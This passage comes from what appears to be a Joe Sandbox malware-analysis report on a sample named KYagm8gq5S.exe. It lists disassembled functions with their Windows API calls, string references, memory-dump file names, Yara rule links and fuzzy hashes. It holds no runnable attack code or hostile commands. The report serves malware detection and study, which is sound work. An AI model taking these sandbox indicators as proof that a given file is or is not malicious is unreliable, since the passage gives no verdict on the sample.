CloseClipboard.USER32 ref: 00405A9B

Strings

{, xrefs: 0040597E

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 245d7c75552d93292a5d0639f3ad285b68bcb815a2f70b75041fbe35360c6243
Instruction ID: d944e331103d7d797bb7559e04b2c0af071990b1bd98ce6caf222631f3d5da7c
Opcode Fuzzy Hash: 245d7c75552d93292a5d0639f3ad285b68bcb815a2f70b75041fbe35360c6243
Instruction Fuzzy Hash: 47B13971900608FFDB11AF60DD85EAE7B79FB48354F10813AFA41B61A0CB788A51DF68

Function 004049C4 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404A13
SetWindowTextW.USER32(00000000,?), ref: 00404A3D
SHBrowseForFolderW.SHELL32(?), ref: 00404AEE
CoTaskMemFree.OLE32(00000000), ref: 00404AF9
lstrcmpiW.KERNEL32(Del,007A1748,00000000,?,?), ref: 00404B2B
lstrcatW.KERNEL32(?,Del), ref: 00404B37
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B49

Part of subcall function 00405B98: GetDlgItemTextW.USER32(?,?,00000400,00404B80), ref: 00405BAB

Part of subcall function 00406802: CharNextW.USER32(?,*?|<>/":,00000000,007B3000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00406865
Part of subcall function 00406802: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406874
Part of subcall function 00406802: CharNextW.USER32(?,007B3000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00406879
Part of subcall function 00406802: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 0040688C

GetDiskFreeSpaceW.KERNEL32(0079F718,?,?,0000040F,?,0079F718,0079F718,?,00000001,0079F718,?,?,000003FB,?), ref: 00404C0C
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C27

Part of subcall function 00404D80: lstrlenW.KERNEL32(007A1748,007A1748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E21
Part of subcall function 00404D80: wsprintfW.USER32 ref: 00404E2A
Part of subcall function 00404D80: SetDlgItemTextW.USER32(?,007A1748), ref: 00404E3D

Strings

A, xrefs: 00404AE7
Del, xrefs: 00404B25, 00404B2A, 00404B35

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$Del
API String ID: 2624150263-2818320640
Opcode ID: d546a645e60e6957f04ba02b6a3eb8270b6339cfa2b22d8784a61d082e69804a
Instruction ID: db18d61dd8e36d4389a3b44505c0f864e6ca322f8728bcf89e652d7f1c678b9a
Opcode Fuzzy Hash: d546a645e60e6957f04ba02b6a3eb8270b6339cfa2b22d8784a61d082e69804a
Instruction Fuzzy Hash: 25A185B1900208ABDB11AFA5DD45BEFB7B8EF84314F11403BF611B62D1D77C9A418B69

Function 004021CF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040224E

Strings

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp, xrefs: 0040228E

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp
API String ID: 542301482-843063114
Opcode ID: 2e4948e65c7aa6382ef10f5b335c56c6e17f10fa883873382e07b1eafca896d3
Instruction ID: d027746e191c14b49f1eee61a42344c893d98f4f720128a79e15815c221bbdc7
Opcode Fuzzy Hash: 2e4948e65c7aa6382ef10f5b335c56c6e17f10fa883873382e07b1eafca896d3
Instruction Fuzzy Hash: 3B411675A00209AFCB00DFE4C989AAD7BB5FF48318B20457EF505EB2D1DB799981CB54

Function 00402930 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040293F

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: dca364261a257630479412f8d24045f74174dcbea33d49aeb6f7c432ef55f1d3
Instruction ID: bedb772ef0a2f17f15cc30cd16f16fd49c67dd7be69949238e740b54367540b4
Opcode Fuzzy Hash: dca364261a257630479412f8d24045f74174dcbea33d49aeb6f7c432ef55f1d3
Instruction Fuzzy Hash: 08F0E231A04100EAD700EBA4DA499AEB374FF04314F20417BE101F30E0D7B84D409B2D

Function 00404F40 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404F58
GetDlgItem.USER32(?,00000408), ref: 00404F63
GlobalAlloc.KERNEL32(00000040,?), ref: 00404FAD
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FC4
SetWindowLongW.USER32(?,000000FC,0040554D), ref: 00404FDD
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FF1
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405003
SendMessageW.USER32(?,00001109,00000002), ref: 00405019
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405025
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405037
DeleteObject.GDI32(00000000), ref: 0040503A
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405065
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405071
SendMessageW.USER32(?,00001132,00000000,?), ref: 0040510C
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040513C

Part of subcall function 00404508: SendMessageW.USER32(00000028,?,00000001,00404333), ref: 00404516

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405150
GetWindowLongW.USER32(?,000000F0), ref: 0040517E
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040518C
ShowWindow.USER32(?,00000005), ref: 0040519C
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405297
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FC
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405311
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405335
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405355
ImageList_Destroy.COMCTL32(?), ref: 0040536A
GlobalFree.KERNEL32(?), ref: 0040537A
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053F3
SendMessageW.USER32(?,00001102,?,?), ref: 0040549C
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AB
InvalidateRect.USER32(?,00000000,00000001), ref: 004054D6
ShowWindow.USER32(?,00000000), ref: 00405524
GetDlgItem.USER32(?,000003FE), ref: 0040552F
ShowWindow.USER32(00000000), ref: 00405536

Strings

N, xrefs: 004051D5
M, xrefs: 004050F4
, xrefs: 0040550E

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 59a12151f687aa456750a72bebcaf03031b6b48c6fd142b985938e878f33cd06
Instruction ID: 3f60975f1bbea04172c566a814ac76c3bf8fe72ba7ce1bc18d7d222ec834a39f
Opcode Fuzzy Hash: 59a12151f687aa456750a72bebcaf03031b6b48c6fd142b985938e878f33cd06
Instruction Fuzzy Hash: B2027870900609AFDF20DF65DC85AAF7BB5FB85314F10816AFA10BA2E1D7798A41CF58

Function 00403FD4 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404010
ShowWindow.USER32(?), ref: 00404030
GetWindowLongW.USER32(?,000000F0), ref: 00404042
ShowWindow.USER32(?,00000004), ref: 0040405B
DestroyWindow.USER32 ref: 0040406F
SetWindowLongW.USER32(?,00000000,00000000), ref: 00404088
GetDlgItem.USER32(?,?), ref: 004040A7
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BB
IsWindowEnabled.USER32(00000000), ref: 004040C2
GetDlgItem.USER32(?,00000001), ref: 0040416D
GetDlgItem.USER32(?,00000002), ref: 00404177
SetClassLongW.USER32(?,000000F2,?), ref: 00404191
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E2
GetDlgItem.USER32(?,00000003), ref: 00404288
ShowWindow.USER32(00000000,?), ref: 004042A9
EnableWindow.USER32(?,?), ref: 004042BB
EnableWindow.USER32(?,?), ref: 004042D6
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EC
EnableMenuItem.USER32(00000000), ref: 004042F3
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430B
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040431E
lstrlenW.KERNEL32(007A1748,?,007A1748,00000000), ref: 00404348
SetWindowTextW.USER32(?,007A1748), ref: 0040435C
ShowWindow.USER32(?,0000000A), ref: 00404490

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 1860320154-0
Opcode ID: bc3e7111866138a7d9fc3d457d106daad5acaba352cfb8b9f49eaf3ae0b18d54
Instruction ID: 556acdb9000d186b886cde9212830cd241fbea6c4840fceff67d75b478af1997
Opcode Fuzzy Hash: bc3e7111866138a7d9fc3d457d106daad5acaba352cfb8b9f49eaf3ae0b18d54
Instruction Fuzzy Hash: 13C1C0B1500604ABDB206F61ED85B2A3A68FBD6359F00453EF791B51F0CB3D5891DB2E

Function 00404692 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404730
GetDlgItem.USER32(?,000003E8), ref: 00404744
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404761
GetSysColor.USER32(?), ref: 00404772
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404780
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040478E
lstrlenW.KERNEL32(?), ref: 00404793
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047A0
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B5
GetDlgItem.USER32(?,0000040A), ref: 0040480E
SendMessageW.USER32(00000000), ref: 00404815
GetDlgItem.USER32(?,000003E8), ref: 00404840
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404883
LoadCursorW.USER32(00000000,00007F02), ref: 00404891
SetCursor.USER32(00000000), ref: 00404894
LoadCursorW.USER32(00000000,00007F00), ref: 004048AD
SetCursor.USER32(00000000), ref: 004048B0
SendMessageW.USER32(00000111,00000001,00000000), ref: 004048DF
SendMessageW.USER32(00000010,00000000,00000000), ref: 004048F1

Strings

F@, xrefs: 0040489C
Del, xrefs: 0040486F
N, xrefs: 0040482E

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: F@$Del$N
API String ID: 3103080414-4255390987
Opcode ID: cd157397fad3e9ba876edf76049899dad645a115876cfb537e4ce2c7fc417499
Instruction ID: 45fb83ade45cfc86163e6b15eb7062ba83955ff26de70ff6e3d1e782862a206c
Opcode Fuzzy Hash: cd157397fad3e9ba876edf76049899dad645a115876cfb537e4ce2c7fc417499
Instruction Fuzzy Hash: 1861A2B1900209BFDF10AF60DD85A6A7B69FB85314F00843AF705B62E0C778AD51CFA9

Function 0040619A Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406335,?,?), ref: 004061D5
GetShortPathNameW.KERNEL32(?,007A4DE8,00000400), ref: 004061DE

Part of subcall function 00405FA9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB9
Part of subcall function 00405FA9: lstrlenA.KERNEL32(00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEB

GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 004061FB
wsprintfA.USER32 ref: 00406219
GetFileSize.KERNEL32(00000000,00000000,007A55E8,C0000000,00000004,007A55E8,?,?,?,?,?), ref: 00406254
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406263
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629B
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A49E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F1
GlobalFree.KERNEL32(00000000), ref: 00406302
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406309

Part of subcall function 00406044: GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\Desktop\KYagm8gq5S.exe,80000000,00000003), ref: 00406048
Part of subcall function 00406044: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606A

Strings

Uz, xrefs: 004061F0
Uz, xrefs: 004061F7
[Rename], xrefs: 00406283, 00406295
Mz, xrefs: 004061C3
%ls=%ls, xrefs: 0040620F

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]$Mz$Uz$Uz
API String ID: 2171350718-3350566011
Opcode ID: a33c05bce7c125d61af8aa6c61577077044d65e406db0fd5498825754e73940b
Instruction ID: b6cadbeacbe634b6bd87c882f2c351c0ea44a21df7cd689b804f2f2a1cba60a5
Opcode Fuzzy Hash: a33c05bce7c125d61af8aa6c61577077044d65e406db0fd5498825754e73940b
Instruction Fuzzy Hash: 2F313770600715BBD2206B658D49F6B3A5CDF82714F16003EFE02F72D2DA7D982486BD

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,007A7260,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 0065e8d55c47ea3cbcda8c109104f1eee6ee8d4d6af800c5cfa02106002edbf4
Instruction ID: f4bc5d4286e22692ddece56c15c19c5fca937d6aefcb7484b61e28148d91a738
Opcode Fuzzy Hash: 0065e8d55c47ea3cbcda8c109104f1eee6ee8d4d6af800c5cfa02106002edbf4
Instruction Fuzzy Hash: 3F418A71804209AFCF058FA5CE459BFBBB9FF45314F00802EF591AA1A0CB389A55DFA4

Function 00406591 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 204stringCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(Del,00000400), ref: 004066B3
GetWindowsDirectoryW.KERNEL32(Del,00000400,00000000,007A0728,?,?,00000000,00000000,00798B00,74DF23A0), ref: 004066C9
SHGetPathFromIDListW.SHELL32(00000000,Del), ref: 00406727
CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406730
lstrcatW.KERNEL32(Del,\Microsoft\Internet Explorer\Quick Launch,00000000,007A0728,?,?,00000000,00000000,00798B00,74DF23A0), ref: 0040675B
lstrlenW.KERNEL32(Del,00000000,007A0728,?,?,00000000,00000000,00798B00,74DF23A0), ref: 004067B5

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406755
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406684
Del, xrefs: 004065BE, 00406678, 0040667F, 00406683, 0040669C, 0040669D, 004066B2, 004066C8, 004066F9, 00406725, 0040675A, 00406760, 0040677D, 00406790, 004067AE, 004067B4, 004067BD, 004067F2

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
String ID: Del$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4024019347-2121604768
Opcode ID: fb78c655de7e04e2c0873077e29524e20483bf8d3f5bca8374ab451ad378ea15
Instruction ID: 996034b20cbe1ccfc182dbfd15fdcef075a6e82f48079f00531b92f4adf5a68d
Opcode Fuzzy Hash: fb78c655de7e04e2c0873077e29524e20483bf8d3f5bca8374ab451ad378ea15
Instruction Fuzzy Hash: D56135716046119BD720AF24DD84B7B77E4AB85318F25063FF687B32D0DA3C8961865E

Function 0040453A Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404557
GetSysColor.USER32(00000000), ref: 00404595
SetTextColor.GDI32(?,00000000), ref: 004045A1
SetBkMode.GDI32(?,?), ref: 004045AD
GetSysColor.USER32(?), ref: 004045C0
SetBkColor.GDI32(?,?), ref: 004045D0
DeleteObject.GDI32(?), ref: 004045EA
CreateBrushIndirect.GDI32(?), ref: 004045F4

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

